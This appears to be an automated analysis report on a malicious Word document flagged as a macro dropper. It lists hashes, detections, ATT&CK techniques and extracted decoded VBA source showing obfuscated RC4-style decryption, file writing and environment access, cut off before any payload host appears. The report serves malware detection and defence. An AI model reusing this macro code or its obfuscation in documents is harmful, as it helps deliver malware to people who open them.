Office (OLE) malware analysis — malicious · 476c9d4383505429

MALICIOUS

Office (OLE)

64.0 KB Created: 2018-04-18 22:29:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 33cd8c06a1bc8eff1e003935069d120a SHA-1: f73e729642c0206c7eda6595bb98eb3d5304f0ec SHA-256: 476c9d4383505429c10c31fb72f5218b3b42d985a2b46a0de62fd6ec5d08eebf

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1140 Deobfuscate or Decode Files or Information T1071.001 Web Protocols

The sample is a malicious Office document containing obfuscated VBA macros. The macros utilize GetObject and CallByName functions, and appear to perform XOR-based decryption on embedded data. The ClamAV detection 'Doc.Dropper.Agent-6517847-0' strongly suggests a dropper functionality, indicating the script's purpose is to download and execute a second-stage payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6517847-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6517847-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
GetObject call high OLE_VBA_GETOBJ

GetObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9189 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9189 bytes
SHA-256: `cf56c83e707b9ee2d94dc5a43db6b0ccbe11da56e6254f29388296a7ccb204e2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "InkEdit1, 0, 0, INKEDLib, InkEdit" Dim i41BE Private Function c7C(o05() As Byte, oB2E104(), yFD79A) On Error Resume Next Dim hBD7(0 To 255), f9DCD1, l283, g3B, k39 As Byte For f9DCD1 = 0 To 255 hBD7(f9DCD1) = oB2E104(f9DCD1) Next f9DCD1 = 0 For f9DCD1 = 0 To yFD79A l283 = n666FC7((l283 + 1), 256) g3B = n666FC7((g3B + hBD7(l283)), 256) k39 = hBD7(l283) hBD7(l283) = hBD7(g3B) hBD7(g3B) = k39 o05(f9DCD1) = i472E14(o05(f9DCD1), (hBD7(n666FC7((hBD7(l283) + hBD7(g3B)), 256)))) Next f9DCD1 c7C = StrConv(o05, 64) End Function Private Function bCEAD(qF23, zFC8B4) Open qF23 For Output As #1 Print #1, zFC8B4 Close #1 End Function Private Function i472E14(k9DA6B, r7C1) i472E14 = (k9DA6B And Not r7C1) Or (Not k9DA6B And r7C1) End Function Private Function mA93D2(gB08150) mA93D2 = Environ(gB08150) End Function Sub iADA19() Dim o8F2EE(5) As Byte o8F2EE(4) = 55 o8F2EE(2) = 48 o8F2EE(1) = 65 o8F2EE(3) = 56 o8F2EE(5) = 54 o8F2EE(0) = 48 Dim gCC3CF(254) As Byte gCC3CF(65) = 126 gCC3CF(143) = 131 gCC3CF(28) = 246 gCC3CF(95) = 5 gCC3CF(232) = 35 gCC3CF(181) = 244 gCC3CF(223) = 70 gCC3CF(184) = 212 gCC3CF(41) = 31 gCC3CF(137) = 110 gCC3CF(166) = 169 gCC3CF(57) = 35 gCC3CF(64) = 165 gCC3CF(46) = 5 gCC3CF(217) = 161 gCC3CF(128) = 123 gCC3CF(185) = 154 gCC3CF(136) = 1 gCC3CF(2) = 198 gCC3CF(12) = 107 gCC3CF(147) = 140 gCC3CF(18) = 77 gCC3CF(9) = 114 gCC3CF(14) = 169 gCC3CF(97) = 138 gCC3CF(218) = 237 gCC3CF(173) = 228 gCC3CF(53) = 98 gCC3CF(179) = 202 gCC3CF(63) = 24 gCC3CF(145) = 134 gCC3CF(235) = 227 gCC3CF(100) = 164 gCC3CF(59) = 167 gCC3CF(16) = 157 gCC3CF(133) = 195 gCC3CF(160) = 46 gCC3CF(183) = 210 gCC3CF(11) = 114 gCC3CF(104) = 212 gCC3CF(7) = 138 gCC3CF(119) = 216 gCC3CF(191) = 140 gCC3CF(244) = 109 gCC3CF(88) = 4 gCC3CF(91) = 233 gCC3CF(24) = 104 gCC3CF(106) = 58 gCC3CF(30) = 16 gCC3CF(114) = 151 gCC3CF(20) = 167 gCC3CF(192) = 44 gCC3CF(153) = 120 gCC3CF(155) = 4 gCC3CF(225) = 85 gCC3CF(161) = 99 gCC3CF(125) = 79 gCC3CF(197) = 91 gCC3CF(205) = 216 gCC3CF(89) = 96 gCC3CF(0) = 70 gCC3CF(110) = 186 gCC3CF(249) = 213 gCC3CF(8) = 145 gCC3CF(105) = 22 gCC3CF(108) = 14 gCC3CF(126) = 116 gCC3CF(1) = 180 gCC3CF(54) = 4 gCC3CF(10) = 213 gCC3CF(15) = 2 gCC3CF(214) = 85 gCC3CF(107) = 194 gCC3CF(90) = 146 gCC3CF(6) = 209 gCC3CF(5) = 77 gCC3CF(19) = 53 gCC3CF(222) = 78 gCC3CF(233) = 77 gCC3CF(39) = 139 gCC3CF(240) = 109 gCC3CF(208) = 51 gCC3CF(247) = 50 gCC3CF(149) = 206 gCC3CF(51) = 161 gCC3CF(229) = 223 gCC3CF(203) = 86 gCC3CF(167) = 31 gCC3CF(44) = 229 gCC3CF(81) = 86 gCC3CF(66) = 253 gCC3CF(226) = 51 gCC3CF(40) = 150 gCC3CF(210) = 227 gCC3CF(79) = 77 gCC3CF(115) = 73 gCC3CF(98) = 86 gCC3CF(101) = 154 gCC3CF(162) = 244 gCC3CF(220) = 115 gCC3CF(94) = 205 gCC3CF(58) = 76 gCC3CF(238) = 168 gCC3CF(228) = 128 gCC3CF(123) = 46 gCC3CF(42) = 167 gCC3CF(144) = 69 gCC3CF(158) = 192 gCC3CF(4) = 111 gCC3CF(72) = 250 gCC3CF(17) = 243 gCC3CF(99) = 23 gCC3CF(177) = 111 gCC3CF(71) = 245 gCC3CF(224) = 91 gCC3CF(86) = 117 gCC3CF(172) = 192 gCC3CF(78) = 67 gCC3CF(159) = 169 gCC3CF(50) = 228 gCC3CF(25) = 57 gCC3CF(170) = 183 gCC3CF(178) = 113 gCC3CF(174) = 139 gCC3CF(234) = 119 gCC3CF(142) = 116 gCC3CF(129) = 119 gCC3CF(87) = 185 gCC3CF(85) = 224 gCC3CF(67) = 52 gCC3CF(118) = 5 gCC3CF(189) = 5 gCC3CF(248) = 23 gCC3CF(56) = 138 gCC3CF(60) = 115 gCC3CF(165) = 59 gCC3CF(37) = 210 gCC3CF(62) = 187 gCC3CF(198) = 33 gCC3CF(84) = 236 gCC3CF(168) = 238 gCC3CF(227) = 25 gCC3CF(152) = 37 gCC3CF(213) = 168 gCC3CF(242) = 234 gCC3CF(243) = 126 gCC3CF(176) = 224 gCC3CF(70) = 65 gCC3CF(29) = 241 gCC3CF(236) = 44 gCC3CF(141) = 117 gCC3CF(237) = 187 gCC3CF(45) = 169 gCC3CF(75) = 123 gCC3CF( ... (truncated)

SHA-256: cf56c83e707b9ee2d94dc5a43db6b0ccbe11da56e6254f29388296a7ccb204e2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "InkEdit1, 0, 0, INKEDLib, InkEdit"
Dim i41BE
Private Function c7C(o05() As Byte, oB2E104(), yFD79A)
On Error Resume Next
Dim hBD7(0 To 255), f9DCD1, l283, g3B, k39 As Byte
For f9DCD1 = 0 To 255
hBD7(f9DCD1) = oB2E104(f9DCD1)
Next
f9DCD1 = 0
For f9DCD1 = 0 To yFD79A
l283 = n666FC7((l283 + 1), 256)
g3B = n666FC7((g3B + hBD7(l283)), 256)
k39 = hBD7(l283)
hBD7(l283) = hBD7(g3B)
hBD7(g3B) = k39
o05(f9DCD1) = i472E14(o05(f9DCD1), (hBD7(n666FC7((hBD7(l283) + hBD7(g3B)), 256))))
Next f9DCD1
c7C = StrConv(o05, 64)
End Function
Private Function bCEAD(qF23, zFC8B4)
Open qF23 For Output As #1
Print #1, zFC8B4
Close #1
End Function
Private Function i472E14(k9DA6B, r7C1)
i472E14 = (k9DA6B And Not r7C1) Or (Not k9DA6B And r7C1)
End Function
Private Function mA93D2(gB08150)
mA93D2 = Environ(gB08150)
End Function
Sub iADA19()
Dim o8F2EE(5) As Byte
o8F2EE(4) = 55
o8F2EE(2) = 48
o8F2EE(1) = 65
o8F2EE(3) = 56
o8F2EE(5) = 54
o8F2EE(0) = 48
Dim gCC3CF(254) As Byte
gCC3CF(65) = 126
gCC3CF(143) = 131
gCC3CF(28) = 246
gCC3CF(95) = 5
gCC3CF(232) = 35
gCC3CF(181) = 244
gCC3CF(223) = 70
gCC3CF(184) = 212
gCC3CF(41) = 31
gCC3CF(137) = 110
gCC3CF(166) = 169
gCC3CF(57) = 35
gCC3CF(64) = 165
gCC3CF(46) = 5
gCC3CF(217) = 161
gCC3CF(128) = 123
gCC3CF(185) = 154
gCC3CF(136) = 1
gCC3CF(2) = 198
gCC3CF(12) = 107
gCC3CF(147) = 140
gCC3CF(18) = 77
gCC3CF(9) = 114
gCC3CF(14) = 169
gCC3CF(97) = 138
gCC3CF(218) = 237
gCC3CF(173) = 228
gCC3CF(53) = 98
gCC3CF(179) = 202
gCC3CF(63) = 24
gCC3CF(145) = 134
gCC3CF(235) = 227
gCC3CF(100) = 164
gCC3CF(59) = 167
gCC3CF(16) = 157
gCC3CF(133) = 195
gCC3CF(160) = 46
gCC3CF(183) = 210
gCC3CF(11) = 114
gCC3CF(104) = 212
gCC3CF(7) = 138
gCC3CF(119) = 216
gCC3CF(191) = 140
gCC3CF(244) = 109
gCC3CF(88) = 4
gCC3CF(91) = 233
gCC3CF(24) = 104
gCC3CF(106) = 58
gCC3CF(30) = 16
gCC3CF(114) = 151
gCC3CF(20) = 167
gCC3CF(192) = 44
gCC3CF(153) = 120
gCC3CF(155) = 4
gCC3CF(225) = 85
gCC3CF(161) = 99
gCC3CF(125) = 79
gCC3CF(197) = 91
gCC3CF(205) = 216
gCC3CF(89) = 96
gCC3CF(0) = 70
gCC3CF(110) = 186
gCC3CF(249) = 213
gCC3CF(8) = 145
gCC3CF(105) = 22
gCC3CF(108) = 14
gCC3CF(126) = 116
gCC3CF(1) = 180
gCC3CF(54) = 4
gCC3CF(10) = 213
gCC3CF(15) = 2
gCC3CF(214) = 85
gCC3CF(107) = 194
gCC3CF(90) = 146
gCC3CF(6) = 209
gCC3CF(5) = 77
gCC3CF(19) = 53
gCC3CF(222) = 78
gCC3CF(233) = 77
gCC3CF(39) = 139
gCC3CF(240) = 109
gCC3CF(208) = 51
gCC3CF(247) = 50
gCC3CF(149) = 206
gCC3CF(51) = 161
gCC3CF(229) = 223
gCC3CF(203) = 86
gCC3CF(167) = 31
gCC3CF(44) = 229
gCC3CF(81) = 86
gCC3CF(66) = 253
gCC3CF(226) = 51
gCC3CF(40) = 150
gCC3CF(210) = 227
gCC3CF(79) = 77
gCC3CF(115) = 73
gCC3CF(98) = 86
gCC3CF(101) = 154
gCC3CF(162) = 244
gCC3CF(220) = 115
gCC3CF(94) = 205
gCC3CF(58) = 76
gCC3CF(238) = 168
gCC3CF(228) = 128
gCC3CF(123) = 46
gCC3CF(42) = 167
gCC3CF(144) = 69
gCC3CF(158) = 192
gCC3CF(4) = 111
gCC3CF(72) = 250
gCC3CF(17) = 243
gCC3CF(99) = 23
gCC3CF(177) = 111
gCC3CF(71) = 245
gCC3CF(224) = 91
gCC3CF(86) = 117
gCC3CF(172) = 192
gCC3CF(78) = 67
gCC3CF(159) = 169
gCC3CF(50) = 228
gCC3CF(25) = 57
gCC3CF(170) = 183
gCC3CF(178) = 113
gCC3CF(174) = 139
gCC3CF(234) = 119
gCC3CF(142) = 116
gCC3CF(129) = 119
gCC3CF(87) = 185
gCC3CF(85) = 224
gCC3CF(67) = 52
gCC3CF(118) = 5
gCC3CF(189) = 5
gCC3CF(248) = 23
gCC3CF(56) = 138
gCC3CF(60) = 115
gCC3CF(165) = 59
gCC3CF(37) = 210
gCC3CF(62) = 187
gCC3CF(198) = 33
gCC3CF(84) = 236
gCC3CF(168) = 238
gCC3CF(227) = 25
gCC3CF(152) = 37
gCC3CF(213) = 168
gCC3CF(242) = 234
gCC3CF(243) = 126
gCC3CF(176) = 224
gCC3CF(70) = 65
gCC3CF(29) = 241
gCC3CF(236) = 44
gCC3CF(141) = 117
gCC3CF(237) = 187
gCC3CF(45) = 169
gCC3CF(75) = 123
gCC3CF(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.